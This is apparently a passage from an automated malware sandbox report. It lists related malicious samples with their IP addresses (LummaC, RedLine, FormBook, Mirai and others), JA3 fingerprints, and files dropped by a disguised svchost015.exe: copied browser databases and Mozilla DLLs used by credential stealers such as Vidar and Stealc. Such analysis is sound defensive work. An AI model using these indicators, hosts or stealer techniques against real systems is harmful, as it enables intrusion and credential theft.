	fEz10JQnRZ.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer, SmokeLoader	Browse	92.36.226.66
	D9pL02CCa3.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer, SmokeLoader	Browse	92.36.226.66
	P61q5FVlmo.exe	Get hash	malicious	LummaC, Go Injector, SmokeLoader	Browse	92.36.226.66
	SUevAm2tWO.exe	Get hash	malicious	LummaC, Go Injector, SmokeLoader	Browse	92.36.226.66
	HliN0ju7OT.exe	Get hash	malicious	LummaC, Go Injector, SmokeLoader	Browse	92.36.226.66
	yEIhhlohep.exe	Get hash	malicious	LummaC, Go Injector, SmokeLoader	Browse	92.36.226.66
	file.exe	Get hash	malicious	Babuk, Djvu	Browse	109.175.29.39
	77.90.35.9-skid.mpsl-2024-07-30T06_23_54.elf	Get hash	malicious	Mirai, Moobot	Browse	92.36.229.172
	file.exe	Get hash	malicious	Babuk, Djvu	Browse	109.175.29.39
SSERVICE-ASRU	file.exe	Get hash	malicious	Unknown	Browse	94.228.169.141
	5d5acf768249e3beb065977b66901b93fd8168d979d06.exe	Get hash	malicious	Raccoon Stealer v2	Browse	94.228.169.161
	1aa954280ff704582990fa686a91f1d142b21000a36a5.exe	Get hash	malicious	Raccoon Stealer v2	Browse	94.228.169.161
	1t7mU6PtWn.exe	Get hash	malicious	RedLine	Browse	94.228.169.207
	aNMgpTs3bp.exe	Get hash	malicious	RedLine	Browse	94.228.168.51
	xxcMteD4B6.dll	Get hash	malicious	Unknown	Browse	94.228.169.123
	xxcMteD4B6.dll	Get hash	malicious	Unknown	Browse	94.228.169.123
	dg.cmd	Get hash	malicious	Unknown	Browse	94.228.169.143
	DarkGateUnpacked.exe	Get hash	malicious	DarkGate	Browse	94.228.169.143
	7c.vbs	Get hash	malicious	Unknown	Browse	94.228.169.143
NTT-LT-ASLT	PI 30_08_2024.exe	Get hash	malicious	FormBook	Browse	84.32.84.32
	play.exe	Get hash	malicious	FormBook	Browse	84.32.84.32
	ORDER_pdf.exe	Get hash	malicious	FormBook	Browse	84.32.84.32
	LPO 92558 & 92669.exe	Get hash	malicious	FormBook	Browse	84.32.84.88
	GOVT __OF SHARJAH - UNIVERSITY OF SHARJAH - Project 0238.exe	Get hash	malicious	FormBook	Browse	84.32.84.32
	Curriculum Vitae.exe	Get hash	malicious	FormBook	Browse	84.32.84.32
	ORDER_38746_pdf.exe	Get hash	malicious	FormBook	Browse	84.32.84.32
	quotation.exe	Get hash	malicious	DarkTortilla, FormBook	Browse	84.32.84.32
	Scan_000019921929240724_PDA _ SOA_Payment Reference TR-37827392-2024-08-29.exe	Get hash	malicious	FormBook	Browse	84.32.84.32
	factura-630.900.exe	Get hash	malicious	FormBook	Browse	84.32.84.32

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a0e9f5d64349fb13191bc781f81f42e1	^=L@test_PC_FilE_2024_as_P@ssKey=^.zip	Get hash	malicious	LummaC, Go Injector, LummaC Stealer	Browse	84.32.84.144
	http://www.yahool.ru/	Get hash	malicious	Unknown	Browse	84.32.84.144
	KbUI.exe	Get hash	malicious	Remcos, PureLog Stealer, XRed	Browse	84.32.84.144
	Launcher_x32_x64.exe	Get hash	malicious	LummaC	Browse	84.32.84.144
	l5u4ezxr.u51.exe	Get hash	malicious	LummaC	Browse	84.32.84.144
	Order enquiry.xla.xlsx	Get hash	malicious	Unknown	Browse	84.32.84.144
	OmnqazpM3P.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, PureLog Stealer, RedLine, Stealc, Vidar	Browse	84.32.84.144
	BankPaymAdviceVend.Report.docx	Get hash	malicious	Unknown	Browse	84.32.84.144
	file.exe	Get hash	malicious	LummaC, PureLog Stealer	Browse	84.32.84.144
	IrisMichael263Fiona.lib.exe	Get hash	malicious	LummaC	Browse	84.32.84.144

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\ProgramData\freebl3.dll	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	1p5yg5LO0h.exe	Get hash	malicious	Vidar	Browse
	OmnqazpM3P.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, PureLog Stealer, RedLine, Stealc, Vidar	Browse
C:\ProgramData\mozglue.dll	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	1p5yg5LO0h.exe	Get hash	malicious	Vidar	Browse
	OmnqazpM3P.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, PureLog Stealer, RedLine, Stealc, Vidar	Browse

Created / dropped Files

C:\ProgramData\FCAAEBFHJJDAAKFIECGDBKJDGI

Download File

Process:	C:\Users\user\AppData\Local\Temp\svchost015.exe
File Type:	SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	5242880
Entropy (8bit):	0.037963276276857943
Encrypted:	false
SSDEEP:	192:58rJQaXoMXp0VW9FxWZWdgokBQNba9D3DO/JxW/QHI:58r54w0VW3xWZWdOBQFal3dQ
MD5:	C0FDF21AE11A6D1FA1201D502614B622
SHA1:	11724034A1CC915B061316A96E79E9DA6A00ADE8
SHA-256:	FD4EB46C81D27A9B3669C0D249DF5CE2B49E5F37B42F917CA38AB8831121ADAC
SHA-512:	A6147C196B033725018C7F28C1E75E20C2113A0C6D8172F5EABCB8FF334EA6CE10B758FFD1D22D50B4DB5A0A21BCC15294AC44E94D973F7A3EB9F8558F31769B
Malicious:	false
Preview:	SQLite format 3......@ ...................&...................K..................................j.....-a>.~...\|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\GCBGIIEC

Download File

Process:	C:\Users\user\AppData\Local\Temp\svchost015.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\IDBKFHJEBAAEBGDGDBFB

Download File

Process:	C:\Users\user\AppData\Local\Temp\svchost015.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	0.8180424350137764
Encrypted:	false
SSDEEP:	96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
MD5:	349E6EB110E34A08924D92F6B334801D
SHA1:	BDFB289DAFF51890CC71697B6322AA4B35EC9169
SHA-256:	C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
SHA-512:	2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\IECFHDBA

Download File

Process:	C:\Users\user\AppData\Local\Temp\svchost015.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\JJDHIDBFBFHIJKFHCGIEGIDAEH

Download File

Process:	C:\Users\user\AppData\Local\Temp\svchost015.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
Category:	dropped
Size (bytes):	28672
Entropy (8bit):	2.5793180405395284
Encrypted:	false
SSDEEP:	96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
MD5:	41EA9A4112F057AE6BA17E2838AEAC26
SHA1:	F2B389103BFD1A1A050C4857A995B09FEAFE8903
SHA-256:	CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
SHA-512:	29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\JKKECBGIIIEBGCBGIDHDGCAKJE

Download File

Process:	C:\Users\user\AppData\Local\Temp\svchost015.exe
File Type:	SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	98304
Entropy (8bit):	0.08235737944063153
Encrypted:	false
SSDEEP:	12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
MD5:	369B6DD66F1CAD49D0952C40FEB9AD41
SHA1:	D05B2DE29433FB113EC4C558FF33087ED7481DD4
SHA-256:	14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
SHA-512:	771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\KJEHDHIEGIIIDHIDHDHJ

Download File

Process:	C:\Users\user\AppData\Local\Temp\svchost015.exe
File Type:	ASCII text, with very long lines (1809), with CRLF line terminators
Category:	dropped
Size (bytes):	9571
Entropy (8bit):	5.536643647658967
Encrypted:	false
SSDEEP:	192:qnaRt+YbBp6ihj4qyaaX86KKkfGNBw8DJSl:yegqumcwQ0
MD5:	5D8E5D85E880FB2D153275FCBE9DA6E5
SHA1:	72332A8A92B77A8B1E3AA00893D73FC2704B0D13
SHA-256:	50490DC0D0A953FA7D5E06105FE9676CDB9B49C399688068541B19DD911B90F9
SHA-512:	57441B4CCBA58F557E08AAA0918D1F9AC36D0AF6F6EB3D3C561DA7953ED156E89857FFB829305F65D220AE1075BC825F131D732B589B5844C82CA90B53AAF4EE
Malicious:	false
Preview:	// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "57f16a19-e119-4073-bf01-28f88011f783");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696333830);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696333856);..user_pref("app.update.lastUpdateTime.xpi-signature-verification

C:\ProgramData\freebl3.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\svchost015.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	685392
Entropy (8bit):	6.872871740790978
Encrypted:	false
SSDEEP:	12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
MD5:	550686C0EE48C386DFCB40199BD076AC
SHA1:	EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
SHA-256:	EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
SHA-512:	0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: 1p5yg5LO0h.exe, Detection: malicious, Browse Filename: OmnqazpM3P.exe, Detection: malicious, Browse
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\mozglue.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\svchost015.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	608080
Entropy (8bit):	6.833616094889818
Encrypted:	false
SSDEEP:	12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
MD5:	C8FD9BE83BC728CC04BEFFAFC2907FE9
SHA1:	95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
SHA-256:	BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
SHA-512:	FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: 1p5yg5LO0h.exe, Detection: malicious, Browse Filename: OmnqazpM3P.exe, Detection: malicious, Browse
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\msvcp140.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\svchost015.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	450024
Entropy (8bit):	6.673992339875127
Encrypted:	false
SSDEEP:	12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
MD5:	5FF1FCA37C466D6723EC67BE93B51442
SHA1:	34CC4E158092083B13D67D6D2BC9E57B798A303B
SHA-256:	5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
SHA-512:	4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

C:\ProgramData\nss3.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\svchost015.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2046288
Entropy (8bit):	6.787733948558952
Encrypted:	false
SSDEEP:	49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
MD5:	1CC453CDF74F31E4D913FF9C10ACDDE2
SHA1:	6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
SHA-256:	AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
SHA-512:	DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................\|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\softokn3.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\svchost015.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	257872
Entropy (8bit):	6.727482641240852
Encrypted:	false
SSDEEP:	6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
MD5:	4E52D739C324DB8225BD9AB2695F262F
SHA1:	71C3DA43DC5A0D2A1941E874A6D015A071783889
SHA-256:	74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
SHA-512:	2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................\|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\vcruntime140.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\svchost015.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	80880
Entropy (8bit):	6.920480786566406
Encrypted:	false
SSDEEP:	1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
MD5:	A37EE36B536409056A86F50E67777DD7
SHA1:	1CAFA159292AA736FC595FC04E16325B27CD6750
SHA-256:	8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
SHA-512:	3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...\|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{3DA71D5A-20CC-432F-A115-DFE92379E91F}.3.ver0x000000000000002d.db

Download File

Process:	C:\Windows\explorer.exe
File Type:	data
Category:	dropped
Size (bytes):	106000
Entropy (8bit):	4.021784706403305
Encrypted:	false
SSDEEP:	768:27FioIKjdkaG8fvwUdjk0O6Pq9+Se8zGNmLmDcJzy4JxzHkR1vIoVYsizmEDypXe:SJkonIOe91z7NfphMiNG7nU1FY+KPZYt
MD5:	F6236895DD653FF16A69BE822665DAB0
SHA1:	36900D559D8FA1993849ACFEA09E41BE8427EA75
SHA-256:	8C901293E5982B8AD79AFF10E5C9D97E3D49DF000A16FE3B5B50FA0DFBAF743D
SHA-512:	6CAC3494C7420300BE3D590BBDE3B1C1271A382305504FCCC068F5B3C23999DC380400516CEDB3DCE8AA0E5D62172C0068087DBDF2F2C0A5C31B30FF244D7FC5
Malicious:	false
Preview:	....h... ..............P..............Y...8...^...p...................W.......e.n.-.C.H.;.e.n.-.G.B..............................P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....P.1...........user.<............................................j.o.n.e.s.....V.1...........AppData.@............................................A.p.p.D.a.t.a.....V.1...........Roaming.@............................................R.o.a.m.i.n.g.....\.1...........Microsoft.D............................................M.i.c.r.o.s.o.f.t.....V.1...........Windows.@............................................W.i.n.d.o.w.s.....`.1...........Start Menu..F............................................S.t.a.r.t. .M.e.n.u.................. ..........P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....P.1...........user.<............................................j.o.n.e.s

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\freebl3[1].dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\svchost015.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	685392
Entropy (8bit):	6.872871740790978
Encrypted:	false
SSDEEP:	12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
MD5:	550686C0EE48C386DFCB40199BD076AC
SHA1:	EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
SHA-256:	EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
SHA-512:	0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\mozglue[1].dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\svchost015.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	608080
Entropy (8bit):	6.833616094889818
Encrypted:	false
SSDEEP:	12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
MD5:	C8FD9BE83BC728CC04BEFFAFC2907FE9
SHA1:	95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
SHA-256:	BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
SHA-512:	FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\msvcp140[1].dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\svchost015.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	450024
Entropy (8bit):	6.673992339875127
Encrypted:	false
SSDEEP:	12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
MD5:	5FF1FCA37C466D6723EC67BE93B51442
SHA1:	34CC4E158092083B13D67D6D2BC9E57B798A303B
SHA-256:	5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
SHA-512:	4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\nss3[1].dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\svchost015.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2046288
Entropy (8bit):	6.787733948558952
Encrypted:	false
SSDEEP:	49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
MD5:	1CC453CDF74F31E4D913FF9C10ACDDE2
SHA1:	6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
SHA-256:	AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
SHA-512:	DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
